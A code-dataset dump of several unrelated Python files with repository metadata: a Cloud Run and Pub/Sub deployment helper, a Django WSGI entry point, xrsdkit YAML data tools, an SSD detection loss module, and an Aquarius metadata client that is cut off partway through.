subscriptions = list_subscriptions_in_project(project)
# Create a unique subscription ID
subscription_name = "{}-{}".format(service_name, topic_name)
subscriber = pubsub_v1.SubscriberClient()
subscription_path = subscriber.subscription_path(project, subscription_name)
publisher = pubsub_v1.PublisherClient()
topic_path = publisher.topic_path(project, topic_name)
if subscription_path not in subscriptions:
run_and_output([
"gcloud", "beta", "pubsub", "subscriptions", "create",
subscription_path, "--topic", topic_path,
"--push-endpoint={}".format(service_url),
"--push-auth-service-account={}".format(service_account_email)
])
def deploy_cloud_run_topic_responder(project,
region,
function_name,
memory="2Gi",
concurrency=80,
timeout="14m"):
image_uri = _build_cloud_run_image(function_name, project)
function_name = re.sub("_", "-", function_name)
topic_name = "{}-trigger".format(function_name)
update_service(function_name,
image_uri,
region=region,
memory=memory,
concurrency=concurrency,
timeout=timeout)
domain = get_domain_for_cloudrun_service(service_name=function_name,
region=region)
service_account_email = configure_invoker_sa(service_name=function_name,
project=project,
region=region)
maybe_add_pubsub_token_creator_policy(project)
maybe_create_topic(project=project, topic_name=topic_name)
maybe_create_subscription_for_service(
service_name=function_name,
service_account_email=service_account_email,
service_url=domain,
project=project,
region=region,
topic_name=topic_name)
| 30.503165 | 79 | 0.665629 | 1,089 | 9,639 | 5.606061 | 0.20753 | 0.066503 | 0.046683 | 0.014742 | 0.238329 | 0.161835 | 0.116298 | 0.04095 | 0.02457 | 0.02457 | 0 | 0.0045 | 0.239236 | 9,639 | 315 | 80 | 30.6 | 0.828038 | 0.079158 | 0 | 0.177665 | 0 | 0 | 0.098711 | 0.032564 | 0 | 0 | 0 | 0 | 0 | 1 | 0.071066 | false | 0 | 0.086294 | 0 | 0.208122 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b9f6e5c5c532895f403065515cdf1483093087d | 849 | py | Python | nubrain/wsgi.py | NuChwezi/nubrain | 0b7fc9ed269a008c406ac36f49aa5ec44fca619a | [
"MIT"
] | 1 | 2015-06-25T22:09:49.000Z | 2015-06-25T22:09:49.000Z | nubrain/wsgi.py | NuChwezi/nubrain | 0b7fc9ed269a008c406ac36f49aa5ec44fca619a | [
"MIT"
] | null | null | null | nubrain/wsgi.py | NuChwezi/nubrain | 0b7fc9ed269a008c406ac36f49aa5ec44fca619a | [
"MIT"
] | null | null | null | import os, sys
base = os.path.dirname(os.path.dirname(__file__))
base_parent = os.path.dirname(base)
# Remember original sys.path.
prev_sys_path = list(sys.path)
#new path...
sys.path.append(base)
sys.path.append(base_parent)
env_path = os.path.join(base, 'env/lib/python2.7/site-packages')
import site
site.addsitedir(env_path)
# Reorder sys.path so new directories at the front.
new_sys_path = []
for item in list(sys.path):
if item not in prev_sys_path:
new_sys_path.append(item)
sys.path.remove(item)
sys.path[:0] = new_sys_path
os.environ['DJANGO_SETTINGS_MODULE'] = 'nubrain.settings'
# Activate your virtual env
activate_env=os.path.join(base, 'env/bin/activate_this.py')
execfile(activate_env, dict(__file__=activate_env))
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
| 23.583333 | 64 | 0.755006 | 137 | 849 | 4.445255 | 0.386861 | 0.149425 | 0.064039 | 0.055829 | 0.055829 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004021 | 0.121319 | 849 | 35 | 65 | 24.257143 | 0.812332 | 0.134276 | 0 | 0 | 0 | 0 | 0.127397 | 0.105479 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.15 | 0 | 0.15 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0ba98472f49aced69213c027832d40a0432607c7 | 16,822 | py | Python | xrsdkit/tools/ymltools.py | scattering-central/pysaxs | fe46ae16f26cd40a1deea4dce222245960687a5d | [
"BSD-3-Clause-LBNL"
] | 5 | 2018-06-27T02:54:11.000Z | 2021-07-23T20:42:14.000Z | xrsdkit/tools/ymltools.py | scattering-central/pysaxs | fe46ae16f26cd40a1deea4dce222245960687a5d | [
"BSD-3-Clause-LBNL"
] | 78 | 2018-04-18T17:07:37.000Z | 2019-07-02T21:40:09.000Z | xrsdkit/tools/ymltools.py | scattering-central/pysaxs | fe46ae16f26cd40a1deea4dce222245960687a5d | [
"BSD-3-Clause-LBNL"
] | 1 | 2021-01-15T11:13:54.000Z | 2021-01-15T11:13:54.000Z | from __future__ import print_function
from collections import OrderedDict
import os
import sys
import copy
from distutils.dir_util import copy_tree
import shutil
from sklearn import preprocessing
import pandas as pd
import numpy as np
import yaml
from . import profiler, primitives
from ..system import System
from .. import definitions as xrsdefs
def save_sys_to_yaml(file_path,sys):
sd = sys.to_dict()
with open(file_path, 'w') as yaml_file:
yaml.dump(primitives(sd),yaml_file)
def load_sys_from_yaml(file_path):
with open(file_path, 'r') as yaml_file:
sd = yaml.load(yaml_file)
return System(**sd)
def read_local_dataset(dataset_dirs, downsampling_distance=None, message_callback=print):
"""Load xrsdkit data from one or more local dataset directories.
Each dataset directory should contain
one subdirectory for each experiment in the dataset.
The subdirectory names should be the same as the experiment_id labels
for all samples in the subdirectory.
Each subdirectory should contain .yml files describing
the xrsdkit.system.System objects from the experiment.
Each .yml file should have a corresponding data file in the same directory,
where the data file contains the integrated scattering pattern.
The name of the data file should be specified in the .yml file,
referenced to sample_metadata['data_file'].
TODO: move this dataset description to the main documentation,
then refer to it from here.
Parameters
----------
dataset_dirs : list
list of absolute paths to the dataset root directories
Returns
-------
df : pandas.DataFrame
modeling DataFrame built from dataset files
index_df : pandas.DataFrame
indexing DataFrame for associating .yml and .dat files
with the corresponding experiment_id and sample_id.
"""
sys_dicts = OrderedDict()
ind_dict = {}
for dataset_dir in dataset_dirs:
idx_df = pd.DataFrame(columns=['sample_id','experiment_id','yml_file','data_file'])
for experiment in os.listdir(dataset_dir):
exp_data_dir = os.path.join(dataset_dir,experiment)
if os.path.isdir(exp_data_dir):
for s_data_file in os.listdir(exp_data_dir):
if s_data_file.endswith('.yml'):
if message_callback:
message_callback('loading data from {}'.format(s_data_file))
file_path = os.path.join(exp_data_dir, s_data_file)
sys = load_sys_from_yaml(file_path)
data_file = sys.sample_metadata['data_file']
idx_df = idx_df.append(dict(
sample_id=sys.sample_metadata['sample_id'],
experiment_id=sys.sample_metadata['experiment_id'],
yml_file=s_data_file,
data_file=sys.sample_metadata['data_file']
), ignore_index=True)
sys_dicts[s_data_file] = sys.to_dict()
ind_dict[dataset_dir] = idx_df
df = create_modeling_dataset(list(sys_dicts.values()),
downsampling_distance=downsampling_distance,
message_callback=message_callback)
return df, ind_dict
def migrate_features(data_dir):
"""Update features for all yml files in a local directory.
Parameters
----------
data_dir : str
absolute path to the directory containing yml data
"""
print('BEGINNING FEATURE MIGRATION FOR DIRECTORY: {}'.format(data_dir))
for s_data_file in os.listdir(data_dir):
if s_data_file.endswith('.yml'):
print('loading data from {}'.format(s_data_file))
file_path = os.path.join(data_dir, s_data_file)
sys = load_sys_from_yaml(file_path)
q_I = np.loadtxt(os.path.join(data_dir,sys.sample_metadata['data_file']))
sys.features = profiler.profile_pattern(q_I[:,0],q_I[:,1])
save_sys_to_yaml(file_path,sys)
print('FINISHED FEATURE MIGRATION')
def create_modeling_dataset(xrsd_system_dicts, downsampling_distance=None, message_callback=print):
"""Build a modeling DataFrame from xrsdkit.system.System objects.
If `downsampling_distance` is not None, the dataset will be
downsampled with downsample_by_group(downsampling_distance).
Parameters
----------
xrsd_system_dicts: list of dict
Dicts describing all xrsdkit.system.System
objects in the dataset. Each of these dicts should be
similar to the output of xrsdkit.system.System.to_dict().
Returns
-------
df_work : pandas.DataFrame
dataframe containing features and labels
exctracted from the dataset.
"""
data = []
cls_labels = []
reg_labels = []
feat_labels = []
all_reg_labels = set()
all_cls_labels = set()
for sys in xrsd_system_dicts:
expt_id, sample_id, data_file, good_fit, feature_labels, \
classification_labels, regression_outputs = unpack_sample(sys)
if good_fit:
for k,v in regression_outputs.items():
all_reg_labels.add(k)
reg_labels.append(regression_outputs)
for k,v in classification_labels.items():
all_cls_labels.add(k)
cls_labels.append(classification_labels)
feat_labels.append(feature_labels)
data.append([expt_id,sample_id])
reg_labels_list = list(all_reg_labels)
reg_labels_list.sort()
cls_labels_list = list(all_cls_labels)
cls_labels_list.sort()
for datai,cli,rli,featsi in zip(data,cls_labels,reg_labels,feat_labels):
ocl = OrderedDict.fromkeys(cls_labels_list)
ocl.update(cli)
orl = OrderedDict.fromkeys(reg_labels_list)
orl.update(rli)
ofl = OrderedDict.fromkeys(profiler.profile_keys)
ofl.update(featsi)
datai.extend(list(ocl.values()))
datai.extend(list(orl.values()))
datai.extend(list(ofl.values()))
colnames = ['experiment_id','sample_id'] + \
cls_labels_list + \
reg_labels_list + \
copy.copy(profiler.profile_keys)
df_work = pd.DataFrame(data=data, columns=colnames)
if downsampling_distance:
df_work = downsample_by_group(df_work,downsampling_distance,message_callback)
return df_work
def unpack_sample(sys_dict):
"""Extract features and labels from the dict describing the sample.
Parameters
----------
sys_dict : dict
dict containing description of xrsdkit.system.System.
Includes fit_report, sample_metadata, features,
noise_model, and one dict for each of the populations.
Returns
-------
expt_id : str
id of the experiment (should be unique across all experiments)
sample_id : str
id of the sample (must be unique across all samples)
data_file, : str
name of .dat file that contains q/I array
good_fit : bool
True if this sample's fit is good enough to train models on it
features : dict
dict of features with their values,
similar to output of xrsdkit.tools.profiler.profile_pattern()
classification_labels : dict
dict of all classification labels with their values for given sample
regression_labels : dict
dict of all regression labels with their values for given sample
"""
expt_id = sys_dict['sample_metadata']['experiment_id']
sample_id = sys_dict['sample_metadata']['sample_id']
data_file = sys_dict['sample_metadata']['data_file']
features = sys_dict['features']
good_fit = bool(sys_dict['fit_report']['good_fit'])
sys = System(**sys_dict)
regression_labels = {}
classification_labels = {}
sys_cls = ''
ipop = 0
I0 = sys.noise_model.parameters['I0']['value']
for k, v in sys.populations.items():
I0 += v.parameters['I0']['value']
I0_noise = sys.noise_model.parameters['I0']['value']
if I0 == 0.:
regression_labels['noise_I0_fraction'] = 0.
else:
regression_labels['noise_I0_fraction'] = I0_noise/I0
classification_labels['noise_model'] = sys.noise_model.model
for param_nm,pd in sys.noise_model.parameters.items():
regression_labels['noise_'+param_nm] = pd['value']
# use xrsdefs.structure_names to index the populations
for struct_nm in xrsdefs.structure_names:
struct_pops = OrderedDict()
for pop_nm,pop in sys.populations.items():
if pop.structure == struct_nm:
struct_pops[pop_nm] = pop
# sort any populations with same structure
struct_pops = sort_populations(struct_nm,struct_pops)
for pop_nm, pop in struct_pops.items():
if I0 == 0.:
regression_labels['pop{}_I0_fraction'.format(ipop)] = 0.
else:
pop_I0 = pop.parameters['I0']['value']
regression_labels['pop{}_I0_fraction'.format(ipop)] = pop_I0/I0
#classification_labels['pop{}_structure'.format(ipop)] = pop.structure
classification_labels['pop{}_form'.format(ipop)] = pop.form
for param_nm, param_def in pop.parameters.items():
regression_labels['pop{}_{}'.format(ipop,param_nm)] = param_def['value']
for stg_nm, stg_val in pop.settings.items():
if stg_nm in xrsdefs.modelable_structure_settings[pop.structure] \
or stg_nm in xrsdefs.modelable_form_factor_settings[pop.form]:
classification_labels['pop{}_{}'.format(ipop,stg_nm)] = str(stg_val)
if sys_cls: sys_cls += '__'
sys_cls += pop.structure
ipop += 1
if sys_cls == '':
sys_cls = 'unidentified'
classification_labels['system_class'] = sys_cls
return expt_id, sample_id, data_file, good_fit, features, classification_labels, regression_labels
def sort_populations(struct_nm,pops_dict):
"""Sort a set of populations (all with the same structure)"""
if len(pops_dict) < 2:
return pops_dict
new_pops = OrderedDict()
# get a list of the population labels
pop_labels = list(pops_dict.keys())
# collect params for each population
param_vals = dict.fromkeys(pop_labels)
for l in pop_labels: param_vals[l] = []
param_labels = []
dtypes = {}
if struct_nm == 'crystalline':
# order crystalline structures primarily by lattice,
# secondly by form factor
for l in pop_labels:
param_vals[l].append(sgs.lattices.index(pops_dict[l].settings['lattice']))
param_labels.append('lattice')
dtypes['lattice']='int'
for l in pop_labels:
param_vals[l].append(xrsdefs.form_factor_names.index(pops_dict[l].form))
param_labels.append('form')
dtypes['form']='int'
# NOTE: the following only works if the previous two categories were all-same
#for param_nm in xrsdefs.structure_params(struct_nm,pops_dict[l].settings):
# for l in pop_labels: param_vals[l].append(pops_dict[l].parameters[param_nm]['value'])
# param_labels.append(param_nm)
# dtypes[param_nm]='float'
if struct_nm == 'disordered':
# order disordered structures primarily by interaction,
# secondly by form factor
intxns = xrsdefs.setting_selections('interaction')
for l in pop_labels:
param_vals[l].append(intxns.index(pops_dict[l].settings['interaction']))
param_labels.append('interaction')
dtypes['interaction']='int'
for l in pop_labels:
param_vals[l].append(xrsdefs.form_factor_names.index(pops_dict[l].form))
param_labels.append('form')
dtypes['form']='int'
# NOTE: the following only works if the previous two categories were all-same
#for param_nm in xrsdefs.structure_params(struct_nm,pops_dict[l].settings):
# for l in pop_labels: param_vals[l].append(pops_dict[l].parameters[param_nm]['value'])
# param_labels.append(param_nm)
# dtypes[param_nm]='float'
# for diffuse structures, order primarily by form,
# secondly by form factor params
if struct_nm == 'diffuse':
for l in pop_labels:
param_vals[l].append(xrsdefs.form_factor_names.index(pops_dict[l].form))
param_labels.append('form')
dtypes['form']='int'
ff = pops_dict[pop_labels[0]].form
if all([pops_dict[ll].form == ff for ll in pop_labels]):
for param_nm in xrsdefs.form_factor_params(ff):
for l in pop_labels: param_vals[l].append(pops_dict[l].parameters[param_nm]['value'])
param_labels.append(param_nm)
dtypes[param_nm]='float'
param_ar = np.array(
[tuple([l]+param_vals[l]) for l in pop_labels],
dtype = [('pop_name','U32')]+[(pl,dtypes[pl]) for pl in param_labels]
)
param_ar.sort(axis=0,order=param_labels)
for ip,p in enumerate(param_ar): new_pops[p[0]] = pops_dict[p[0]]
return new_pops
def downsample_by_group(df,min_distance=1.,message_callback=print):
"""Group and down-sample a DataFrame of xrsd records.
Parameters
----------
df : pandas.DataFrame
dataframe containing xrsd samples
min_distance : float
the minimum allowed nearest-neighbor distance
for continuing to downsample after 10 or more samples
have been selected
Returns
-------
data_sample : pandas.DataFrame
DataFrame containing all of the down-sampled data from
each group in the input dataframe.
Features in this DataFrame are not scaled:
the correct scaler should be applied before training models.
"""
data_sample = pd.DataFrame(columns=df.columns)
group_cols = ['experiment_id','system_class']
all_groups = df.groupby(group_cols)
# downsample each group independently
for group_labels,grp in all_groups.groups.items():
group_df = df.iloc[grp].copy()
if message_callback:
message_callback('Downsampling data for group: {}'.format(group_labels))
#lbl_df = _filter_by_labels(data,lbls)
dsamp = downsample(df.iloc[grp].copy(), min_distance)
if message_callback:
message_callback('Finished downsampling: kept {}/{}'.format(len(dsamp),len(group_df)))
data_sample = data_sample.append(dsamp)
return data_sample
def downsample(df, min_distance):
"""Downsample records from one DataFrame.
Transforms the DataFrame feature arrays
(scaling by the columns in profiler.profile_keys),
before collecting at least 10 samples.
If the size of `df` is <= 10, it is returned directly.
If it is larger than 10, the first point is chosen
based on greatest nearest-neighbor distance.
Subsequent points are chosen
in order of decreasing nearest-neighbor distance
to the already-sampled points.
Parameters
----------
df : pandas.DataFrame
dataframe containing xrsd samples
min_distance : float
the minimum allowed nearest-neighbor distance
for continuing to downsample after 10 or more samples
have been selected
Returns
-------
sample : pandas.DataFrame
dataframe containing downsampled rows
"""
df_size = len(df)
sample = pd.DataFrame(columns=df.columns)
if df_size <= 10:
sample = sample.append(df)
else:
scaler = preprocessing.StandardScaler()
scaler.fit(df[profiler.profile_keys])
# get distance matrix between samples in scaled feature space
features_matr = scaler.transform(df[profiler.profile_keys])
dist_func = lambda i,j: np.sum(
np.linalg.norm(features_matr[i]
- features_matr[j]))
# TODO: compute only the upper or lower triangle of this matrix
dist_matrix = np.array([[dist_func(i,j) for i in range(df_size)] for j in range(df_size)])
# artificially inflate self-distance,
# so that samples are not their own nearest neighbors
for i in range(df_size):
dist_matrix[i,i] = float('inf')
# samples are taken in order of greatest nearest-neighbor distance
nn_distance_array = np.min(dist_matrix,axis=1)
sample_order = np.argsort(nn_distance_array)[::-1]
keep_samples = np.array([idx<10 or nn_distance_array[sample_idx]>min_distance for idx,sample_idx in enumerate(sample_order)])
sample_order = sample_order[keep_samples]
sample = sample.append(df.iloc[sample_order])
return sample
| 40.340528 | 133 | 0.655867 | 2,204 | 16,822 | 4.788566 | 0.162886 | 0.01895 | 0.011465 | 0.008528 | 0.270324 | 0.215748 | 0.19007 | 0.159181 | 0.145821 | 0.134262 | 0 | 0.003965 | 0.250386 | 16,822 | 416 | 134 | 40.4375 | 0.83299 | 0.322197 | 0 | 0.122271 | 0 | 0 | 0.069032 | 0 | 0 | 0 | 0 | 0.004808 | 0 | 1 | 0.039301 | false | 0 | 0.061135 | 0 | 0.135371 | 0.030568 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0baa358b8a90d3a13df8f439de6acfd48646e1c7 | 9,968 | py | Python | SSD/SSD_FPN_GIoU/utils/loss/multibox_loss.py | ForrestPi/ObjectDetection | 54e0821e73f67be5360c36f01229a123c34ab3b3 | [
"MIT"
] | 12 | 2020-03-25T01:24:22.000Z | 2021-09-18T06:40:16.000Z | SSD/SSD_FPN_GIoU/utils/loss/multibox_loss.py | ForrestPi/ObjectDetection | 54e0821e73f67be5360c36f01229a123c34ab3b3 | [
"MIT"
] | 1 | 2020-04-22T07:52:36.000Z | 2020-04-22T07:52:36.000Z | SSD/SSD_FPN_GIoU/utils/loss/multibox_loss.py | ForrestPi/ObjectDetection | 54e0821e73f67be5360c36f01229a123c34ab3b3 | [
"MIT"
] | 4 | 2020-03-25T01:24:26.000Z | 2020-09-20T11:29:09.000Z | # -*- coding: utf-8 -*-
import torch
import torch.nn as nn
import torch.nn.functional as F
from ..box import match, log_sum_exp
from ..box import match_gious,bbox_overlaps_giou,decode
class FocalLoss(nn.Module):
"""
This criterion is a implemenation of Focal Loss, which is proposed in
Focal Loss for Dense Object Detection.
Loss(x, class) = - \alpha (1-softmax(x)[class])^gamma \log(softmax(x)[class])
The losses are averaged across observations for each minibatch.
Args:
alpha(1D Tensor, Variable) : the scalar factor for this criterion
gamma(float, double) : gamma > 0; reduces the relative loss for well-classified examples (p > .5),
putting more focus on hard, misclassified examples
size_average(bool): By default, the losses are averaged over observations for each minibatch.
However, if the field size_average is set to False, the losses are
instead summed for each minibatch.
"""
def __init__(self, class_num, alpha=None, gamma=2, size_average=True):
super(FocalLoss, self).__init__()
if alpha is None:
self.alpha = torch.ones(class_num, 1)
else:
self.alpha = alpha
self.gamma = gamma
self.class_num = class_num
self.size_average = size_average
print(self.gamma,self.alpha)
def forward(self, inputs, targets):
N = inputs.size(0)
C = inputs.size(1)
P = F.softmax(inputs,dim= 1)
class_mask = inputs.data.new(N, C).fill_(0)
#class_mask = Variable(class_mask)
ids = targets.view(-1, 1)
class_mask.scatter_(1, ids.data, 1.)
if inputs.is_cuda and not self.alpha.is_cuda:
self.alpha = self.alpha.cuda()
alpha = self.alpha[ids.data.view(-1)]
probs = (P*class_mask).sum(1).view(-1,1)
log_p = probs.log()
batch_loss = -alpha*(torch.pow((1-probs), self.gamma))*log_p
if self.size_average:
loss = batch_loss.mean()
else:
loss = batch_loss.sum()
return loss
class GiouLoss(nn.Module):
"""
This criterion is a implemenation of Giou Loss, which is proposed in
Generalized Intersection over Union Loss for: A Metric and A Loss for Bounding Box Regression.
Loss(loc_p, loc_t) = 1-GIoU
The losses are summed across observations for each minibatch.
Args:
size_sum(bool): By default, the losses are summed over observations for each minibatch.
However, if the field size_sum is set to False, the losses are
instead averaged for each minibatch.
predmodel(Corner,Center): By default, the loc_p is the Corner shape like (x1,y1,x2,y2)
The shape is [num_prior,4],and it's (x_1,y_1,x_2,y_2)
loc_p: the predict of loc
loc_t: the truth of boxes, it's (x_1,y_1,x_2,y_2)
"""
def __init__(self,pred_mode = 'Center',size_sum=True,variances=None):
super(GiouLoss, self).__init__()
self.size_sum = size_sum
self.pred_mode = pred_mode
self.variances = variances
def forward(self, loc_p, loc_t,prior_data):
num = loc_p.shape[0]
if self.pred_mode == 'Center':
decoded_boxes = decode(loc_p, prior_data, self.variances)
else:
decoded_boxes = loc_p
#loss = torch.tensor([1.0])
gious =1.0 - bbox_overlaps_giou(decoded_boxes,loc_t)
loss = torch.sum(gious)
if self.size_sum:
loss = loss
else:
loss = loss/num
return 5*loss
class MultiBoxLoss(nn.Module):
"""SSD Weighted Loss Function
Compute Targets:
1) Produce Confidence Target Indices by matching ground truth boxes
with (default) 'priorboxes' that have jaccard index > threshold parameter
(default threshold: 0.5).
2) Produce localization target by 'encoding' variance into offsets of ground
truth boxes and their matched 'priorboxes'.
3) Hard negative mining to filter the excessive number of negative examples
that comes with using a large number of default bounding boxes.
(default negative:positive ratio 3:1)
Objective Loss:
L(x,c,l,g) = (Lconf(x, c) + αLloc(x,l,g)) / N
Where, Lconf is the CrossEntropy Loss and Lloc is the SmoothL1 Loss
weighted by α which is set to 1 by cross val.
Args:
c: class confidences,
l: predicted boxes,
g: ground truth boxes
N: number of matched default boxes
See: https://arxiv.org/pdf/1512.02325.pdf for more details.
"""
def __init__(self, cfg, overlap_thresh, prior_for_matching,
bkg_label, neg_mining, neg_pos, neg_overlap, encode_target,
use_gpu=True,loss_c = "CrossEntropy", loss_r = 'SmoothL1'):
super(MultiBoxLoss, self).__init__()
self.use_gpu = use_gpu
self.num_classes = cfg['num_classes']
self.threshold = overlap_thresh
self.background_label = bkg_label
self.encode_target = encode_target
self.use_prior_for_matching = prior_for_matching
self.do_neg_mining = neg_mining
self.negpos_ratio = neg_pos
self.neg_overlap = neg_overlap
self.variance = cfg['variance']
self.focalloss = FocalLoss(self.num_classes,gamma=2,size_average = False)
self.gious = GiouLoss(pred_mode = 'Center',size_sum=True,variances=self.variance)
self.loss_c = loss_c
self.loss_r = loss_r
if self.loss_r != 'SmoothL1' or self.loss_r !='Giou':
assert Exception("THe loss_r is Error, loss name must be SmoothL1 or Giou")
elif self.loss_c != 'CrossEntropy' or self.loss_c !='FocalLoss':
assert Exception("THe loss_c is Error, loss name must be CrossEntropy or FocalLoss")
elif self.loss_r == 'Giou':
match_gious(self.threshold, truths, defaults, self.variance, labels,
loc_t, conf_t, idx)
def forward(self, predictions, targets):
"""Multibox Loss
Args:
predictions (tuple): A tuple containing loc preds, conf preds,
and prior boxes from SSD net.
conf shape: torch.size(batch_size,num_priors,num_classes)
loc shape: torch.size(batch_size,num_priors,4)
priors shape: torch.size(num_priors,4)
targets (tensor): Ground truth boxes and labels for a batch,
shape: [batch_size,num_objs,5] (last idx is the label).
"""
loc_data, conf_data, priors = predictions
num = loc_data.size(0)
priors = priors[:loc_data.size(1), :]
num_priors = (priors.size(0))
# match priors (default boxes) and ground truth boxes
loc_t = torch.Tensor(num, num_priors, 4)
conf_t = torch.LongTensor(num, num_priors)
for idx in range(num):
truths = targets[idx][:, :-1].data
labels = targets[idx][:, -1].data
defaults = priors.data
if self.loss_r == 'SmoothL1':
match(self.threshold, truths, defaults, self.variance, labels,
loc_t, conf_t, idx)
elif self.loss_r == 'Giou':
match_gious(self.threshold, truths, defaults, self.variance, labels,
loc_t, conf_t, idx)
if self.use_gpu:
loc_t = loc_t.cuda()
conf_t = conf_t.cuda()
# wrap targets
#loc_t = Variable(loc_t, requires_grad=True)
#conf_t = Variable(conf_t, requires_grad=True)
pos = conf_t > 0
num_pos = pos.sum(dim=1, keepdim=True)
# Localization Loss (Smooth L1)
# Shape: [batch,num_priors,4]
pos_idx = pos.unsqueeze(pos.dim()).expand_as(loc_data)
loc_p = loc_data[pos_idx].view(-1, 4)
loc_t = loc_t[pos_idx].view(-1, 4)
if self.loss_r == 'SmoothL1':
loss_l = F.smooth_l1_loss(loc_p, loc_t, reduction='sum')
elif self.loss_r == 'Giou':
giou_priors = priors.data.unsqueeze(0).expand_as(loc_data)
loss_l = self.gious(loc_p,loc_t,giou_priors[pos_idx].view(-1, 4))
# Compute max conf across batch for hard negative mining
if self.loss_c == "CrossEntropy":
batch_conf = conf_data.view(-1, self.num_classes)
loss_c = log_sum_exp(batch_conf) - batch_conf.gather(1, conf_t.view(-1, 1))
# Hard Negative Mining
loss_c = loss_c.view(num, -1)
loss_c[pos] = 0
_, loss_idx = loss_c.sort(1, descending=True)
_, idx_rank = loss_idx.sort(1)
num_pos = pos.long().sum(1, keepdim=True)
num_neg = torch.clamp(self.negpos_ratio*num_pos, max=pos.size(1)-1)
neg = idx_rank < num_neg.expand_as(idx_rank)
# Confidence Loss Including Positive and Negative Examples
pos_idx = pos.unsqueeze(2).expand_as(conf_data)
neg_idx = neg.unsqueeze(2).expand_as(conf_data)
conf_p = conf_data[(pos_idx+neg_idx).gt(0)].view(-1, self.num_classes)
targets_weighted = conf_t[(pos+neg).gt(0)]
loss_c = F.cross_entropy(conf_p, targets_weighted, reduction='sum')
# Sum of losses: L(x,c,l,g) = (Lconf(x, c) + αLloc(x,l,g)) / N
elif self.loss_c == "FocalLoss":
batch_conf = conf_data.view(-1, self.num_classes)
loss_c = self.focalloss(batch_conf,conf_t)
N = num_pos.data.sum().double()
loss_l = loss_l.double()
loss_c = loss_c.double()
loss_l /= N
loss_c /= N
return loss_l, loss_c
| 41.190083 | 110 | 0.599318 | 1,375 | 9,968 | 4.155636 | 0.193455 | 0.016626 | 0.012601 | 0.019601 | 0.20371 | 0.169583 | 0.131082 | 0.10798 | 0.083479 | 0.083479 | 0 | 0.014666 | 0.302267 | 9,968 | 241 | 111 | 41.360996 | 0.806614 | 0.337681 | 0 | 0.120301 | 0 | 0 | 0.042512 | 0 | 0 | 0 | 0 | 0 | 0.015038 | 1 | 0.045113 | false | 0 | 0.037594 | 0 | 0.12782 | 0.007519 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0bac96be21f324633762090b8c1c981aac177216 | 4,309 | py | Python | backend/squid_py/aquariuswrapper.py | OutlierVentures/H2O | 73137b3a00b3f6767aea7e67227d08a1508194ae | [
"Apache-2.0"
] | 9 | 2018-12-26T17:07:58.000Z | 2019-06-03T06:46:24.000Z | backend/squid_py/aquariuswrapper.py | OutlierVentures/H2O | 73137b3a00b3f6767aea7e67227d08a1508194ae | [
"Apache-2.0"
] | 2 | 2018-12-19T21:06:51.000Z | 2021-05-09T18:43:19.000Z | backend/squid_py/aquariuswrapper.py | OutlierVentures/H2O | 73137b3a00b3f6767aea7e67227d08a1508194ae | [
"Apache-2.0"
] | 1 | 2019-05-15T17:19:59.000Z | 2019-05-15T17:19:59.000Z | import json
import logging
import requests
class AquariusWrapper(object):
def __init__(self, aquarius_url):
"""
The Metadata class is a wrapper on the Metadata Store, which has exposed a REST API
:param aquarius_url:
"""
if '/api/v1/aquarius/assets' in aquarius_url:
aquarius_url = aquarius_url[:aquarius_url.find('/api/v1/aquarius/assets')]
self._base_url = '{}/api/v1/aquarius/assets'.format(aquarius_url)
self._headers = {'content-type': 'application/json'}
logging.debug("Metadata Store connected at {}".format(aquarius_url))
logging.debug("Metadata Store API documentation at {}/api/v1/docs".format(aquarius_url))
logging.debug("Metadata assets at {}".format(self._base_url))
def get_service_endpoint(self, did):
return self._base_url + '/ddo/%s' % did
def list_assets(self):
asset_list = json.loads(requests.get(self._base_url).content)
if asset_list and 'ids' in asset_list:
return asset_list['ids']
return []
def get_asset_metadata(self, asset_did):
response = requests.get(self._base_url + '/ddo/%s' % asset_did).content
if not response:
return {}
try:
parsed_response = json.loads(response)
except TypeError:
parsed_response = None
if parsed_response is None:
return {}
return parsed_response
def list_assets_metadata(self):
return json.loads(requests.get(self._base_url + '/ddo').content)
def publish_asset_metadata(self, asset_ddo):
asset_did = asset_ddo.did
response = requests.post(self._base_url + '/ddo', data=asset_ddo.as_text(), headers=self._headers)
if response.status_code == 500:
raise ValueError("This Asset ID already exists! \n\tHTTP Error message: \n\t\t{}".format(response.text))
elif response.status_code == 400:
raise Exception("400 ERROR Full error: \n{}".format(response.text))
elif response.status_code != 201:
raise Exception("{} ERROR Full error: \n{}".format(response.status_code, response.text))
elif response.status_code == 201:
response = json.loads(response.content)
logging.debug("Published asset DID {}".format(asset_did))
return response
else:
raise Exception("ERROR")
def update_asset_metadata(self, asset_did, asset_ddo):
return json.loads(
requests.put(self._base_url + '/ddo/%s' % asset_did, data=asset_ddo.as_text(),
headers=self._headers).content)
def text_search(self, text, sort=None, offset=100, page=0):
payload = {"text": text, "sort": sort, "offset": offset, "page": page}
response = requests.get(
self._base_url + '/ddo/query',
params=payload,
headers=self._headers
).content
if not response:
return {}
try:
parsed_response = json.loads(response)
except TypeError:
parsed_response = None
if parsed_response is None:
return []
elif isinstance(parsed_response, list):
return parsed_response
else:
raise ValueError('Unknown search response, expecting a list got "%s.' % type(parsed_response))
def query_search(self, search_query):
